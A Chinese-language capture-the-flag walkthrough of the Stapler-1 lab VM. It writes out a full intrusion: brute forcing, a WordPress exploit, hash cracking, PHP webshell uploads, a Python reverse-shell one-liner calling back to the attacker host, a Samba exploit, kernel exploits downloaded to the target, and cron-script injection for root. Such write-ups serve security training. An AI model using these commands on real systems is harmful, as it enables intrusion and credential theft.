目录

前言

简介

信息收集

0x00 主机发现

0x01 端口探测

0x02 信息收集-1

0x03 信息收集-2

0x04 漏洞利用-1

0x05 信息收集-3

0x06 漏洞利用-2

0x07 漏洞利用-3

0x08漏洞利用-4

0x09 漏洞利用-5

0x10 漏洞利用-6

0x11 漏洞利用-7

提权

0x12 提权-1-内核提权

0x13 提权-2-内核提权2

0x14 提权-3-sudo提权

0x15 提权-4-计划写入文件提权

总结

前言

这个靶场令我收获颇深,因为这里利用到的一些手法已经算是实战的技术,同时这里使用了多种方法getshell,getsehll之后又展示了多中方法提权,更多的开拓了我们的思维。

简介

kali攻击机:192.168.1.12

靶机:192.168.1.24

信息收集

0x00 主机发现

arp-scan -l

0x01 端口探测

nmap -sV -p- -A -T5 192.168.1.24

这里有多个高危端口可以利用,小编会在接下来的操作一一解答。

20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))

0x02 信息收集-1

通过上面扫面到的端口,我们可以看到一些高危端口,以及一些未授权服务,nmap扫描直接暴露出了ftp是属于未授权登入,我们登入直接看里面信息。

ftp 192.168.1.24
账号:Anonymous  没有密码get note        将文件下载到本地

里面有一个文件,我们直接下载到本地进行分析

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.有用的信息并不多,发现两个用户名
Elly
John

0x03 信息收集-2

像这种没有找到东西的情况下,我们可以使用工具帮助我们信息收集

enum4linux:enum4linux是Kali Linux自带的一款信息收集工具。
它可以收集Windows系统的大量信息,如用户名列表、主机列表、
共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等enum4linux -a ip    #做所有简单枚举(-U -S -G -P -r -o -n -i),
如果您没有提供任何其他选项,则启用此选项
enum4linux -l ip    #通过LDAP 389 / TCP获取一些(有限的)信息(仅适用于DN)
enum4linux -o ip    #获取操作系统信息
enum4linux -r ip    #通过RID循环枚举用户
enum4linux -a 192.168.1.24

发现有两个共享文件和大量用户名,我们收集用户名,放入一个文件夹中。

S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
vi user.txtcat user.txt | cut -d '\' -f2 | cut -d ' ' -f1 > user.txt
利用cut命令对数据进行整理,提取我们需要的部分

0x04 漏洞利用-1

使用hydra进行爆破,成功爆破出一组ssh的账号密码以及一组ftp的账号密码。

hydra -L user.txt -P user.txt 192.168.1.24 ssh
[22][ssh] host: 192.168.1.24   login: SHayslett   password: SHaysletthydra -L user.txt -P user.txt 192.168.1.24 ftp
[21][ftp] host: 192.168.1.24   login: SHayslett   password: SHayslett

进入ssh后,接下来就可以进去直接提权啦~~~

ftp里面并没有发现什么有用的信息,不过还是可以进去看看的,这里小编就不演示了,有兴趣的小伙伴可以进去玩玩~~

这里先不展示了,我们后面统一提权。

0x05 信息收集-3

刚刚展示完21,22端口,接下来看看80端口

发现80端口啥也没有,对他进行目录爆破也没发现什么可以利用的东西,我们转眼望去,发现还有一个http服务,12380端口。

他是存在东西的,我们现在使用工具对网站进行分析

nikto -h http://192.168.1.24:12380/

发现该网站启用了ssl协议,并且开启找到了两个目录路径

admin112233
blogblog

发现一个站,这个站非常熟悉有没有,没错就是我们的wordpress

https://192.168.1.24:12380/blogblog/

时候我们不用紧张,如果我们对站不熟悉的话,我们这里可以用到的方法很多,我们可以直接将这个地址丢到awvs进行扫描,或者使用wapcan去进行扫描,这里小编直接使用wpscan扫描

wpscan --url https://192.168.1.24:12380/blogblog/ -e u --api-token rXPAHHYlLrF3xr50aaaFKWdIsNckML8Oqhr7sCpdJqQ --disable-tls-checks--disable-tls-checks   正常情况下wpscan只能扫描http,加这个命令可以让它扫描https
--api-token            使用接口,需要我们登入wpscan官网注册
-e       爆破用户名
-o       输出文件
-t       最大线程
-P       密码本
-U       用户本注意:没注册的小伙伴可以直接如下访问,会有报错让我们去官网注册。
wpscan --url https://192.168.1.24:12380/blogblog/ --disable-tls-checks

我们发现很多有用的信息,包括漏洞

https://192.168.1.24:12380/blogblog/wp-login.php?action=register
https://192.168.1.24:12380/blogblog/wp-content/uploads/

这些漏洞不会利用下面会给出连接让我们去看我们可以直接去利用

我们现在访问刚刚收集的两个网站地址。

0x06 漏洞利用-2

https://192.168.1.24:12380/blogblog/wp-content/uploads/

我们点进去

Parent Directory  ->  plugins  ->  advanced-video-embed-embed-videos-or-playlists/https://192.168.1.24:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

发现这里有问题,谷歌搜索,

wordpress advanced video exploit

发现这里有个漏洞可以利用,直接返回数据库的账号密码。

我们直接进kali搜索

searchsploit 39646
locate php/webapps/39646.py
cp /usr/share/exploitdb/exploits/php/webapps/39646.py .
vi 39646.py
python 39646.pyimport ssl
ssl._create_default_https_context = ssl._create_unverified_contexthttps://192.168.1.24:12380/blogblog/

如下修改一下配置,因为原本的poc是只能用于http,我们这里使用的https,所以需要对poc进行一下修改。

修改完之后,直接运行poc,然后我们去访问上传地址发现多了一个文件

https://192.168.1.24:12380/blogblog/wp-content/uploads/

我们下载到本地

wget https://192.168.1.24:12380/blogblog/wp-content/uploads/573090841.jpeg --no-check-certificatefile 573090841.jpeg

然后对文件进行分析,发现是一个php文件,打开看一下ls

/** MySQL database username */
define('DB_USER', 'root');/** MySQL database password */
define('DB_PASSWORD', 'plbkac');账号:root  密码:plbkac


mysql -uroot -pplbkac -h 192.168.1.24show databases;
use wordpress
show tables;
desc wp_users;
select user_login,user_pass from wp_users;

这里我们直接跳到结果,过程小伙伴们自己尝试哈

我们发现这个账号密码是通过加密的。我们可以复制出来整理

+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+
vi sql.txt
awk -F'|' '{print $3}' sql.txt > sql1.txt  利用正则选出我们需要的部分

hash-identifier
$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0任意用一个密码去看这是什么加密

使用md5解密

john --wordlist=/usr/share/wordlists/rockyou.txt sql1.txt
cd ~/.john
vi john.pot

经过小编尝试,好像只有一组密码能登入进去

账号:john
密码:incorrect

找到wordpress的后台

https://192.168.1.24:12380/blogblog/wp-login.php

进入后台,之后对网站进行信息收集,发现文件上传点

Plugins-> add New ->upload Plugin :存在上传文件

locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
下载默认的php木马到本地
vi php-reverse-shell.phpnc -vlp 1234   kali监听
监听后去点击上传的文件:https://192.168.1.24:12380/blogblog/wp-content/uploads/

只需要修改一处反弹地址,点击文件后监听成功。

监听成功后可以进行提权,提权后面统一讲解。

0x07 漏洞利用-3

前面发现的部分大都相同,先生成文件,将文件通过后台上传,然后使用密码连接

weevely generate passwd dayu.php     生成php文件weevely https://192.168.1.24:12380/blogblog/wp-content/uploads/dayu.php passwd
连接

0x08漏洞利用-4

前面几乎差不多,就是利用的点不同,这里就不截图了,方法和3一样

webacoo -g -o test.phpwebacoo -t -u https://192.168.1.24:12380/blogblog/wp-content/uploads/test.php

0x09 漏洞利用-5

使用msf生成php脚本,然后监听,反弹shell

//生成webshell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.12 LPORT=4455 -f raw > ms.php//监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.1.12
set LPORT 4455
run

0x10 漏洞利用-6

我们上面有进入一个数据库中,发现数据库存在写入权限。使用msyql数据库写入脚本

mysql -uroot -pplbkac -h 192.168.1.24 select ‘<?php eval($_POST["cmd"]);?>’ into file '/var/www/https/blogblog/wp-content/uploads/shell.php';

木马写入成功,直接执行命令

https://192.168.1.24:12380/blogblog/wp-content/uploads/shell.php?cmd=id

nc -vlp  6677      kali监听https://192.168.1.24:12380/blogblog/wp-content/uploads/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.12",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
反弹shell

0x11 漏洞利用-7

这种方法最好用,就是我们还记得他开放着139端口,这个端口是一个高危端口,它是永痕之蓝的常用端口之一。我们现在使用msf直接获取他的root权限。

139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
msfconsole
search Samba   ---符合2017年的就几个
use exploit/linux/samba/is_known_pipename
set rhosts 192.168.1.24
set rport 139
run

提权

0x12 提权-1-内核提权

上述我们已经在0x10中获取到了root权限那个我们可以算是一种提权,直接通过smb的永恒之蓝获取用户的root权限,所以这个漏洞在实战中也是很危险的。

接下来我们了解一下内核提权,任意进入一个shell,就是我们上面漏洞利用了那么多次得到的shell。我这里使用的是(0x05 漏洞利用-2)中的shell,忘记了的可以去看看上面的内容。

uname -a                           查看系统版本内核
searchsploit Linux Kernel 4.4.x    根据版本内核找到可以利用的exp
cp /usr/share/exploitdb/exploits/linux/local/39772.txt .    将exp下载到本地我们看内容发现利用不了,只是给了我们方法

我们接下来去网上去寻找exp,在github上找到了

exp下载地址:
https://github.com/p4sschen/ubuntu16-39772.zip-exp.git
解压之后有个39772.zip文件,我们将39772.zip下载到靶机中去通过python开通服务
kali:
python -m http.server 8001靶机:
cd /tmp
wget http://192.168.1.12:8001/39772.zipunzip 39772.zip           解压
cd 39772                  进入文件夹
tar xvf exploit.tar       解压其中一个文件
cd ebpf_mapfd_doubleput_exploit   是存在compile.sh文件的
chmod +x compile.sh       给文件权限
./compile.sh              生成一个文件doubleput
ls
./doubleput               执行文件,等待一会

成功获取root权限

0x13 提权-2-内核提权2

我们上面使用的是linux内核提权,现在我们使用ubantu内核提权

exp下载地址:
https://github.com/arthepsy/CVE-2021-4034.git
先下载到本地,然后通过python开通服务,下载到本地,跟上面操作一样,就不继续操作了,直接在展示wget http://192.168.1.12:8002/cve-2021-4034poc.c
gcc cve-2021-4034-poc.c -o test
chmod +x test
./test

直接获取root权限

0x14 提权-3-sudo提权

我们这里可以使用内网常用的扫描脚本,上传到内网,进行信息收集,发现内网存在多处可以利用的信息

这里我们可以发现peter这个用户存在sudo权限,我们继续信息收集

cd /home           进入用户目录
grep -rn "ssh"     枚举出所有含有ssh的信息

JKanode/.bash_history:6:sshpass -p thisimypassword ssh JKanode@localhost
JKanode/.bash_history:7:apt-get install sshpass
JKanode/.bash_history:8:sshpass -p JZQuyIN5 peter@localhost账号:JKanode      密码:thisimypassword
账号:peter        密码:JZQuyIN5

这个时候我们可以直接验证了

ssh peter@192.168.1.24
我们发现直接登入会显示zsh的shell,
这个时候我们需要使用bash的shell,这样顺手一点ssh peter@192.168.1.24 -t '/bin/bash'
sudo -l
sudo su

获得root权限

0x15 提权-4-计划写入文件提权

一般我们找不到内核提权或者一些简单的提权方式的时候,我们可以写入定时任务,我们找定时任务的时候还得找权限高的定时任务,不然反弹到了权限也没什么用。

find / -name cronlog 2>/dev/null    ---查看计划任务日志信息
find / -writable 2>/dev/null   ---枚举所有可写入权限的文件
find / -perm -o+w -type f 2> /dev/null | grep /proc -v   ---枚举
find / -name logrotate* 2>/dev/null  ----查找和logrotate相关的文件信息
cat /etc/cron.d/logrotate
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
每五分钟运行一次cron-logrotate.sh!插入代码:
echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit" >> /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
等待五分钟......./tmp/exploit -p

获得root权限!!!

总结

我们这里总共用到了7种方法获取权限,5钟方式获取root权限,很大程度开阔了哦我们的思路,如果有别的方法的小伙伴欢迎提出建议哦。

Stapler-1靶场详细教学(7种漏洞利用+5种提权)相关推荐

  1. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  2. Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权)

    Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权) 靶机地址:https://www.five86.com/dc-2.html 下载靶机将其导入到VMware,然后设置网络模式为N ...

  3. 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)

    利用Metasploit对HFS 2.3渗透攻击提权 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) msf6 > search hfs Matching Mod ...

  4. Pwn2Own 大赛赐我灵感,让我发现仨Oracle VirtualBox 漏洞,其中俩提权

     聚焦源代码安全,网罗国内外最新资讯! 作者:MAX VAN AMERONGEN 编译:代码卫士 摘要 本文作者说明了自己在为2021年 Pwn2Own 大赛准备期间,如何意外发现三个 Oracle ...

  5. linux自动更新漏洞,Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  6. 一起来看看Fastjson的三种漏洞利用链

    作者 | 4ra1n 来源 | https://www.anquanke.com/post/id/248892 Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比 JdbcRow ...

  7. DVWA靶场01-系统命令执行漏洞利用及防护(Low/Medium/Hight)

    目录 01-Low 01.1 任意文件读取 01.2 小马实现Getshell 01.2.1 获取网站路径 01.2.2 写入一句话木马 01.2.3 连接一句话木马 01.3 设置后门 02-Med ...

  8. 卡巴微软趋势科技等多款流行的反恶意软件产品被曝多个漏洞,可导致提权等后果...

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 近日,CyberArk 公司的研究员从多款流行的反病毒软件解决方案中发现了多个漏洞,可导致攻击者提升权限,从而帮助恶意软件维持自己在受 ...

  9. 【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三:Raven-2(服务利用,udf提权)

最新文章

  1. 人脸识别屡遭非议 会成为“潘多拉魔盒”吗
  2. 安卓和ios抓包神器
  3. 《Leadership and the One Minute Manager》读书笔记之一
  4. 工业级服务器销售电话,工业级服务器
  5. LeetCode上稀缺的四道shell编程题解析
  6. PAT1097:Deduplication on a Linked List
  7. Yii CDBCriteria常用方法
  8. mysql中 s命令_Mysql-概念及常用命令
  9. 最新处理器排名_安兔兔Android处理器天梯榜发布:最强的还是它
  10. OpenStack Juno系列之计算节点搭建
  11. matlab 多项式表达,MATLAB自学笔记(十七):多项式及其函数
  12. java实现权重随机算法
  13. 【数据分析】基于matlab伊藤微分方程布朗运动分析【含Matlab源码 261期】
  14. Vue中使用Echarts构建3D地球
  15. 《软件工程导论》考研复习
  16. VS2005 执行控制台程序的时候,窗口一闪就没了的问题
  17. 每日一练 — 2021.12.30
  18. 前端 导出二进制流文件
  19. 太原理工和山西大学计算机,双一流建设后,山西大学和太原理工你更想去哪一个?...
  20. Java用于取得当前日期相对应的月初,月末,季初,季末,年初,年末时间

热门文章

  1. 章节四:运输层介绍和UDP
  2. 江苏开放计算机绘图作业1,江苏开放大学计算机绘图形考1
  3. rust怎么建莲花房_《Rust》生存指南及房屋建造攻略
  4. 苹果手机删除的照片和视频能恢复吗?
  5. 毕业设计之——论文参考文献格式
  6. 计算机绘图教程试卷,计算机绘图教程.ppt
  7. sata+usb+wifi,用linux实现软raid多轻松,软raid实现raid5
  8. 微信公众号开发教程[012]-素材管理
  9. 变幻多端云彩高清动态壁纸分享
  10. org.apache.rocketmq.remoting.exception.RemotingTooMuchRequestException: sendDefaultImpl call timeout